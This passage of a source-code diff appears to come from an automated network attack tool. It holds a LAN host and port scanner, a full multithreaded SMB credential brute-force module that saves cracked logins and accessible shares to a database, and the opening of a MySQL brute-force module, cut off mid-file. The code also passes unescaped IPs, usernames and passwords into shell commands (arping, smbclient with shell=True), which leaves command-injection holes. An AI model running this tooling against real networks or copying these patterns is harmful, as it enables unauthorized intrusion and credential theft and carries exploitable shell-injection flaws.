                        if line.strip().startswith(ip):
                            cand = _normalize_mac(line)
                            if cand:
                                mac = cand
                                break
                    if not mac:
                        cand = _normalize_mac(out)
                        if cand:
                            mac = cand
                except Exception as e:
                    self.logger.debug(f"arp-scan fallback failed for {ip}: {e}")

            # 3) ip neigh
            if not mac:
                try:
                    neigh = subprocess.check_output(['ip', 'neigh', 'show', ip],
                                                    universal_newlines=True, stderr=subprocess.STDOUT)
                    cand = _normalize_mac(neigh)
                    if cand:
                        mac = cand
                except Exception:
                    pass

            # 4) filter invalid/broadcast
            if _is_bad_mac(mac):
                mac = None

            return mac

        except Exception as e:
            self.logger.error(f"Error in get_mac_address: {e}")
            return None

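    # --- Illustrative sketch (editor's example, not part of the original scanner) ---
    # The regex in get_mac_address() accepts ':' or '-' separators and lowercases
    # the result. Standalone version of the same normalization, reference only:
    def _demo_normalize_mac(self, raw):
        import re as _re
        mac_re = _re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
        m = mac_re.search(raw or "")
        # _demo_normalize_mac("AA-BB-CC-DD-EE-FF") -> 'aa:bb:cc:dd:ee:ff'
        return m.group(0).replace('-', ':').lower() if m else None
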
    # ---------- port scanning ----------
    class PortScannerWorker:
        def __init__(self, outer, target, open_ports, portstart, portend, extra_ports):
            self.outer = outer
            self.target = target
            self.open_ports = open_ports
            self.portstart = int(portstart)
            self.portend = int(portend)
            self.extra_ports = [int(p) for p in (extra_ports or [])]

        def scan_one(self, port):
            if self.outer.shared_data.orchestrator_should_exit:
                return
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            try:
                s.connect((self.target, port))
                with self.outer.lock:
                    self.open_ports.setdefault(self.target, []).append(port)
            except Exception:
                pass
            finally:
                try:
                    s.close()
                except Exception:
                    pass
            self.outer.update_progress('port', 1)

        def run(self):
            if self.outer.shared_data.orchestrator_should_exit:
                return
            threads = []
            for port in range(self.portstart, self.portend):
                if self.outer.shared_data.orchestrator_should_exit:
                    break
                t = threading.Thread(target=self.scan_one, args=(port,))
                t.start()
                threads.append(t)
            for port in self.extra_ports:
                if self.outer.shared_data.orchestrator_should_exit:
                    break
                t = threading.Thread(target=self.scan_one, args=(port,))
                t.start()
                threads.append(t)
            for t in threads:
                if self.outer.shared_data.orchestrator_should_exit:
                    break
                t.join()

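    # --- Illustrative sketch (editor's example, not part of the original scanner) ---
    # PortScannerWorker uses a plain TCP connect() test per port. The same check
    # as a single standalone call (reference only, never invoked here):
    def _demo_tcp_port_open(self, host, port, timeout=2.0):
        import socket as _socket
        try:
            with _socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False
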
    # ---------- main scan block ----------
    class ScanPorts:
        class IpData:
            def __init__(self):
                self.ip_list = []
                self.hostname_list = []
                self.mac_list = []

        def __init__(self, outer, network, portstart, portend, extra_ports):
            self.outer = outer
            self.network = network
            self.portstart = int(portstart)
            self.portend = int(portend)
            self.extra_ports = [int(p) for p in (extra_ports or [])]
            self.ip_data = self.IpData()
            self.ip_hostname_list = []  # tuples (ip, hostname, mac)
            self.host_threads = []
            self.open_ports = {}
            self.all_ports = []

            # NEW: per-run pending cache for unresolved IPs (no DB writes)
            # ip -> {'hostnames': set(), 'ports': set(), 'first_seen': ts, 'essid': str}
            self.pending = {}

        def scan_network_and_collect(self):
            if self.outer.shared_data.orchestrator_should_exit:
                return

            t0 = time.time()
            self.outer.nm.scan(hosts=str(self.network), arguments='-sn -PR')
            hosts = list(self.outer.nm.all_hosts())
            if self.outer.blacklistcheck:
                hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist]

            self.outer.total_hosts = len(hosts)
            self.outer.scanned_hosts = 0
            self.outer.update_progress('host', 0)
            self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {time.time()-t0:.1f}s)")

            # existing hosts (for quick merge)
            existing_rows = self.outer.shared_data.db.get_all_hosts()
            self.existing_map = {h['mac_address']: h for h in existing_rows}
            self.seen_now = set()

            # vendor/essid
            self.vendor_map = self.outer.load_mac_vendor_map()
            self.essid = self.outer.get_current_essid()

            # per-host threads
            for host in hosts:
                if self.outer.shared_data.orchestrator_should_exit:
                    return
                t = threading.Thread(target=self.scan_host, args=(host,))
                t.start()
                self.host_threads.append(t)

            # wait
            for t in self.host_threads:
                if self.outer.shared_data.orchestrator_should_exit:
                    return
                t.join()

            self.outer.logger.info(
                f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, "
                f"{len(self.ip_hostname_list)} MAC(s) found, {len(self.pending)} unresolved IP(s)"
            )

            # mark unseen as alive=0
            existing_macs = set(self.existing_map.keys())
            for mac in existing_macs - self.seen_now:
                self.outer.shared_data.db.update_host(mac_address=mac, alive=0)

            # feed ip_data
            for ip, hostname, mac in self.ip_hostname_list:
                self.ip_data.ip_list.append(ip)
                self.ip_data.hostname_list.append(hostname)
                self.ip_data.mac_list.append(mac)

        def scan_host(self, ip):
            if self.outer.shared_data.orchestrator_should_exit:
                return
            if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist:
                return
            try:
                # ARP ping to help populate neighbor cache
                os.system(f"arping -c 2 -w 2 {ip} > /dev/null 2>&1")

                # Hostname (validated)
                hostname = ""
                try:
                    hostname = self.outer.nm[ip].hostname()
                except Exception:
                    pass
                hostname = self.outer.validate_hostname(ip, hostname)

                if self.outer.blacklistcheck and hostname and hostname in self.outer.hostname_scan_blacklist:
                    self.outer.update_progress('host', 1)
                    return

                time.sleep(1.0)  # let ARP breathe

                mac = self.outer.get_mac_address(ip, hostname)
                if mac:
                    mac = mac.lower()

                if self.outer.blacklistcheck and mac in self.outer.mac_scan_blacklist:
                    self.outer.update_progress('host', 1)
                    return

                if not mac:
                    # No MAC -> keep it in-memory only (no DB writes)
                    slot = self.pending.setdefault(
                        ip,
                        {'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': self.essid}
                    )
                    if hostname:
                        slot['hostnames'].add(hostname)
                    self.outer.logger.debug(f"Pending (no MAC yet): {ip} hostname={hostname or '-'}")
                else:
                    # MAC found -> write/update in DB
                    self.seen_now.add(mac)
                    vendor = self.outer.mac_to_vendor(mac, self.vendor_map)

                    prev = self.existing_map.get(mac)
                    ips_set, hosts_set, ports_set = set(), set(), set()

                    if prev:
                        if prev.get('ips'):
                            ips_set.update(p for p in prev['ips'].split(';') if p)
                        if prev.get('hostnames'):
                            hosts_set.update(h for h in prev['hostnames'].split(';') if h)
                        if prev.get('ports'):
                            ports_set.update(p for p in prev['ports'].split(';') if p)

                    if ip:
                        ips_set.add(ip)

                    # Update current hostname + track history
                    current_hn = ""
                    if hostname:
                        self.outer.shared_data.db.update_hostname(mac, hostname)
                        current_hn = hostname
                    else:
                        current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else ""

                    ips_sorted = ';'.join(sorted(
                        ips_set,
                        key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0)
                    )) if ips_set else None

                    self.outer.shared_data.db.update_host(
                        mac_address=mac,
                        ips=ips_sorted,
                        hostnames=None,
                        alive=1,
                        ports=None,
                        vendor=vendor or (prev.get('vendor') if prev else ""),
                        essid=self.essid or (prev.get('essid') if prev else None)
                    )

                    # refresh local cache
                    self.existing_map[mac] = dict(
                        mac_address=mac,
                        ips=ips_sorted or (prev.get('ips') if prev else ""),
                        hostnames=current_hn or (prev.get('hostnames') if prev else ""),
                        alive=1,
                        ports=';'.join(sorted(ports_set)) if ports_set else (prev.get('ports') if prev else ""),
                        vendor=vendor or (prev.get('vendor') if prev else ""),
                        essid=self.essid or (prev.get('essid') if prev else "")
                    )

                    with self.outer.lock:
                        self.ip_hostname_list.append((ip, hostname or "", mac))
                    self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})")

            except Exception as e:
                self.outer.logger.error(f"Error scanning host {ip}: {e}")
            finally:
                self.outer.update_progress('host', 1)
                time.sleep(0.05)

        def start(self):
            if self.outer.shared_data.orchestrator_should_exit:
                return
            self.scan_network_and_collect()
            if self.outer.shared_data.orchestrator_should_exit:
                return

            # init structures for ports
            self.open_ports = {ip: [] for ip in self.ip_data.ip_list}

            # port-scan summary
            total_targets = len(self.ip_data.ip_list)
            range_size = max(0, self.portend - self.portstart)
            self.outer.total_ports = total_targets * (range_size + len(self.extra_ports))
            self.outer.scanned_ports = 0
            self.outer.update_progress('port', 0)
            self.outer.logger.info(
                f"Port scan: {total_targets} host(s), range {self.portstart}-{self.portend-1} "
                f"(+{len(self.extra_ports)} extra)"
            )

            # per-IP port scan (threads per port, original logic)
            for idx, ip in enumerate(self.ip_data.ip_list, 1):
                if self.outer.shared_data.orchestrator_should_exit:
                    return
                worker = self.outer.PortScannerWorker(self.outer, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
                worker.run()
                if idx % 10 == 0 or idx == total_targets:
                    found = sum(len(v) for v in self.open_ports.values())
                    self.outer.logger.info(
                        f"Port scan progress: {idx}/{total_targets} hosts, {found} open ports so far"
                    )

            # unique list of open ports
            self.all_ports = sorted(list({p for plist in self.open_ports.values() for p in plist}))
            alive_macs = set(self.ip_data.mac_list)
            total_open = sum(len(v) for v in self.open_ports.values())
            self.outer.logger.info(f"Port scan done: {total_open} open ports across {total_targets} host(s)")
            return self.ip_data, self.open_ports, self.all_ports, alive_macs

    # ---------- orchestration ----------
    def scan(self):
        self.shared_data.orchestrator_should_exit = False
        try:
            if self.shared_data.orchestrator_should_exit:
                self.logger.info("Orchestrator switched to manual mode. Stopping scanner.")
                return

            self.shared_data.bjorn_orch_status = "NetworkScanner"
            self.logger.info("Starting Network Scanner")

            # network
            network = self.get_network() if not self.shared_data.use_custom_network \
                else ipaddress.ip_network(self.shared_data.custom_network, strict=False)

            if network is None:
                self.logger.error("No network available. Aborting scan.")
                return

            self.shared_data.bjorn_status_text2 = str(network)
            portstart = int(self.shared_data.portstart)
            portend = int(self.shared_data.portend)
            extra_ports = self.shared_data.portlist

            scanner = self.ScanPorts(self, network, portstart, portend, extra_ports)
            result = scanner.start()
            if result is None:
                self.logger.info("Scan interrupted (manual mode).")
                return

            ip_data, open_ports_by_ip, all_ports, alive_macs = result

            if self.shared_data.orchestrator_should_exit:
                self.logger.info("Scan canceled before DB finalization.")
                return

            # push ports -> DB (merge by MAC). Only for IPs with known MAC.
            # map ip->mac
            ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)}

            # existing cache
            existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()}

            for ip, ports in open_ports_by_ip.items():
                mac = ip_to_mac.get(ip)
                if not mac:
                    # store to pending (no DB write)
                    slot = scanner.pending.setdefault(
                        ip,
                        {'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid}
                    )
                    slot['ports'].update(ports or [])
                    continue

                prev = existing_map.get(mac)
                ports_set = set()
                if prev and prev.get('ports'):
                    try:
                        ports_set.update([p for p in prev['ports'].split(';') if p])
                    except Exception:
                        pass
                ports_set.update(str(p) for p in (ports or []))

                self.shared_data.db.update_host(
                    mac_address=mac,
                    ports=';'.join(sorted(ports_set, key=lambda x: int(x))),
                    alive=1
                )

            # Late resolution pass: try to resolve pending IPs before stats
            unresolved_before = len(scanner.pending)
            for ip, data in list(scanner.pending.items()):
                if self.shared_data.orchestrator_should_exit:
                    break
                try:
                    guess_hostname = next(iter(data['hostnames']), "")
                except Exception:
                    guess_hostname = ""
                mac = self.get_mac_address(ip, guess_hostname)
                if not mac:
                    continue  # still unresolved for this run

                mac = mac.lower()
                vendor = self.mac_to_vendor(mac, scanner.vendor_map)
                # create/update host now
                self.shared_data.db.update_host(
                    mac_address=mac,
                    ips=ip,
                    hostnames=';'.join(data['hostnames']) or None,
                    vendor=vendor,
                    essid=data.get('essid'),
                    alive=1
                )
                if data['ports']:
                    self.shared_data.db.update_host(
                        mac_address=mac,
                        ports=';'.join(str(p) for p in sorted(data['ports'], key=int)),
                        alive=1
                    )
                del scanner.pending[ip]

            if scanner.pending:
                self.logger.info(
                    f"Unresolved IPs (kept in-memory only this run): {len(scanner.pending)} "
                    f"(resolved during late pass: {unresolved_before - len(scanner.pending)})"
                )

            # stats (alive, total ports, distinct vulnerabilities on alive)
            rows = self.shared_data.db.get_all_hosts()
            alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1]
            all_known = len(rows)

            total_open_ports = 0
            for r in alive_hosts:
                ports_txt = r.get('ports') or ""
                if ports_txt:
                    try:
                        total_open_ports += len([p for p in ports_txt.split(';') if p])
                    except Exception:
                        pass

            try:
                vulnerabilities_count = self.shared_data.db.count_distinct_vulnerabilities(alive_only=True)
            except Exception:
                vulnerabilities_count = 0

            self.shared_data.db.set_stats(
                total_open_ports=total_open_ports,
                alive_hosts_count=len(alive_hosts),
                all_known_hosts_count=all_known,
                vulnerabilities_count=int(vulnerabilities_count)
            )

            # WAL checkpoint + optimize
            try:
                if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "execute"):
                    self.shared_data.db.execute("PRAGMA wal_checkpoint(TRUNCATE);")
                    self.shared_data.db.execute("PRAGMA optimize;")
                    self.logger.debug("WAL checkpoint TRUNCATE + PRAGMA optimize executed.")
            except Exception as e:
                self.logger.debug(f"Checkpoint/optimize skipped or failed: {e}")

            self.shared_data.bjorn_progress = ""
            self.logger.info("Network scan complete (DB updated).")

        except Exception as e:
            if self.shared_data.orchestrator_should_exit:
                self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.")
            else:
                self.logger.error(f"Error in scan: {e}")
        finally:
            with self.lock:
                self.shared_data.bjorn_progress = ""

    # ---------- thread wrapper ----------
    def start(self):
        if not self.running:
            self.running = True
            self.thread = threading.Thread(target=self.scan_wrapper, daemon=True)
            self.thread.start()
            logger.info("NetworkScanner started.")

    def scan_wrapper(self):
        try:
            self.scan()
        finally:
            with self.lock:
                self.shared_data.bjorn_progress = ""
                logger.debug("bjorn_progress reset to empty string")

    def stop(self):
        if self.running:
            self.running = False
            self.shared_data.orchestrator_should_exit = True
            try:
                if hasattr(self, "thread") and self.thread.is_alive():
                    self.thread.join()
            except Exception:
                pass
            logger.info("NetworkScanner stopped.")


if __name__ == "__main__":
    # SharedData must provide .db (BjornDatabase) and fields:
    # default_network_interface, use_custom_network, custom_network,
    # portstart, portend, portlist, blacklistcheck, mac/ip/hostname blacklists,
    # bjorn_progress, bjorn_orch_status, bjorn_status_text2, orchestrator_should_exit.
    from shared import SharedData
    sd = SharedData()
    scanner = NetworkScanner(sd)
    scanner.scan()
331
resources/default_config/actions/smb_bruteforce.py
Normal file
@@ -0,0 +1,331 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets are supplied by the orchestrator (ip, port)
- IP -> (MAC, hostname) resolved from DB.hosts
- Successes are recorded in DB.creds (service='smb'), one row PER SHARE (database=<share>)
- Keeps the original queue/thread logic and signatures. No more rich/progress.
"""

import os
import threading
import logging
import time
from subprocess import Popen, PIPE
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional

from shared import SharedData
from logger import Logger

logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)

b_class = "SMBBruteforce"
b_module = "smb_bruteforce"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800  # 30 minutes between two runs
b_rate_limit = '3/86400'  # at most 3 times per day

IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}


class SMBBruteforce:
    """Orchestrator wrapper -> SMBConnector."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.smb_bruteforce = SMBConnector(shared_data)
        logger.info("SMBConnector initialized.")

    def bruteforce_smb(self, ip, port):
        """Run the SMB bruteforce for (ip, port)."""
        return self.smb_bruteforce.run_bruteforce(ip, port)

    def execute(self, ip, port, row, status_key):
        """Orchestrator entry point (returns 'success' / 'failed')."""
        self.shared_data.bjorn_orch_status = "SMBBruteforce"
        success, results = self.bruteforce_smb(ip, port)
        return 'success' if success else 'failed'


class SMBConnector:
    """Handles SMB attempts, DB persistence, and the IP -> (MAC, hostname) mapping."""

    def __init__(self, shared_data):
        self.shared_data = shared_data

        # Wordlists unchanged
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)

        # Cache IP -> (mac, hostname)
        self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
        self._refresh_ip_identity_cache()

        self.lock = threading.Lock()
        self.results: List[List[str]] = []  # [mac, ip, hostname, share, user, password, port]
        self.queue = Queue()

    # ---------- file utilities ----------
    @staticmethod
    def _read_lines(path: str) -> List[str]:
        try:
            with open(path, "r", encoding="utf-8", errors="ignore") as f:
                return [l.rstrip("\n\r") for l in f if l.strip()]
        except Exception as e:
            logger.error(f"Cannot read file {path}: {e}")
            return []

    # ---------- DB hosts mapping ----------
    def _refresh_ip_identity_cache(self) -> None:
        self._ip_to_identity.clear()
        try:
            rows = self.shared_data.db.get_all_hosts()
        except Exception as e:
            logger.error(f"DB get_all_hosts failed: {e}")
            rows = []

        for r in rows:
            mac = r.get("mac_address") or ""
            if not mac:
                continue
            hostnames_txt = r.get("hostnames") or ""
            current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
            ips_txt = r.get("ips") or ""
            if not ips_txt:
                continue
            for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
                self._ip_to_identity[ip] = (mac, current_hn)

    def mac_for_ip(self, ip: str) -> Optional[str]:
        if ip not in self._ip_to_identity:
            self._refresh_ip_identity_cache()
        return self._ip_to_identity.get(ip, (None, None))[0]

    def hostname_for_ip(self, ip: str) -> Optional[str]:
        if ip not in self._ip_to_identity:
            self._refresh_ip_identity_cache()
        return self._ip_to_identity.get(ip, (None, None))[1]

    # ---------- SMB ----------
    def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
        conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
        try:
            conn.connect(adresse_ip, 445)
            shares = conn.listShares()
            accessible = []
            for share in shares:
                if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
                    continue
                try:
                    conn.listPath(share.name, '/')
                    accessible.append(share.name)
                    logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
                except Exception as e:
                    logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
            try:
                conn.close()
            except Exception:
                pass
            return accessible
        except Exception:
            return []

    def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
        cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
        try:
            process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
            stdout, stderr = process.communicate()
            if b"Sharename" in stdout:
                logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
                return self.parse_shares(stdout.decode(errors="ignore"))
            else:
                logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
                return []
        except Exception as e:
            logger.error(f"Error executing '{cmd}': {e}")
            return []

    @staticmethod
    def parse_shares(smbclient_output: str) -> List[str]:
        shares = []
        for line in smbclient_output.splitlines():
            if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
                parts = line.split()
                if parts:
                    name = parts[0]
                    if name not in IGNORED_SHARES:
                        shares.append(name)
        return shares

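    # --- Illustrative sketch (editor's example, not part of the original action) ---
    # parse_shares() on a trimmed, hypothetical `smbclient -L` listing: header and
    # separator rows are skipped, IGNORED_SHARES filtered out. Reference only.
    @staticmethod
    def _demo_parse_shares():
        sample = (
            "Sharename       Type      Comment\n"
            "---------       ----      -------\n"
            "public          Disk      \n"
            "IPC$            IPC       IPC Service\n"
        )
        return SMBConnector.parse_shares(sample)  # -> ['public']
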
# ---------- DB upsert fallback ----------
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('smb',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='smb'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE(COALESCE("database",""),'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---------- worker / queue ----------
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread for SMB bruteforce attempts."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
shares = self.smb_connect(adresse_ip, user, password)
|
||||
if shares:
|
||||
with self.lock:
|
||||
for share in shares:
|
||||
if share in IGNORED_SHARES:
|
||||
continue
|
||||
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
|
||||
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
|
||||
self.save_results()
|
||||
self.removeduplicates()
|
||||
success_flag[0] = True
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_smb", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_smb)
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
# Fallback: try smbclient -L if nothing was found via SMBConnection
|
||||
if not success_flag[0]:
|
||||
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
shares = self.smbclient_l(adresse_ip, user, password)
|
||||
if shares:
|
||||
with self.lock:
|
||||
for share in shares:
|
||||
if share in IGNORED_SHARES:
|
||||
continue
|
||||
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
|
||||
logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
|
||||
self.save_results()
|
||||
self.removeduplicates()
|
||||
success_flag[0] = True
|
||||
if getattr(self.shared_data, "timewait_smb", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_smb)
|
||||
|
||||
return success_flag[0], self.results
|
||||
|
||||
# ---------- DB persistence ----------
|
||||
def save_results(self):
|
||||
# insert self.results into creds (service='smb'), database = <share>
|
||||
for mac, ip, hostname, share, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="smb",
|
||||
mac=mac,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=share,  # use the 'database' column to distinguish shares
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac, ip=ip, hostname=hostname, user=user,
|
||||
password=password, port=port, database=share
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
# no longer needed with the unique index; kept for compatibility.
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Standalone mode is not used in production; keep it minimal.
|
||||
try:
|
||||
sd = SharedData()
|
||||
smb_bruteforce = SMBBruteforce(sd)
|
||||
logger.info("SMB brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
284
resources/default_config/actions/sql_bruteforce.py
Normal file
@@ -0,0 +1,284 @@
|
||||
"""
|
||||
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
|
||||
- Succès -> DB.creds (service='sql', database=<db>)
|
||||
- Conserve la logique (pymysql, queue/threads)
|
||||
"""
|
||||
|
||||
import os
|
||||
import pymysql
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from queue import Queue
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "SQLBruteforce"
|
||||
b_module = "sql_bruteforce"
|
||||
b_status = "brute_force_sql"
|
||||
b_port = 3306
|
||||
b_parent = None
|
||||
b_service = '["sql"]'
|
||||
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes between two runs
|
||||
b_rate_limit = '3/86400' # at most 3 runs per day
|
||||
|
||||
class SQLBruteforce:
|
||||
"""Wrapper orchestrateur -> SQLConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.sql_bruteforce = SQLConnector(shared_data)
|
||||
logger.info("SQLConnector initialized.")
|
||||
|
||||
def bruteforce_sql(self, ip, port):
|
||||
"""Lance le bruteforce SQL pour (ip, port)."""
|
||||
return self.sql_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
success, results = self.bruteforce_sql(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class SQLConnector:
|
||||
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists unchanged
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Cache IP -> (mac, hostname)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results: List[List[str]] = []  # [ip, user, password, port, database]
|
||||
self.queue = Queue()
|
||||
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---------- DB hosts mapping ----------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
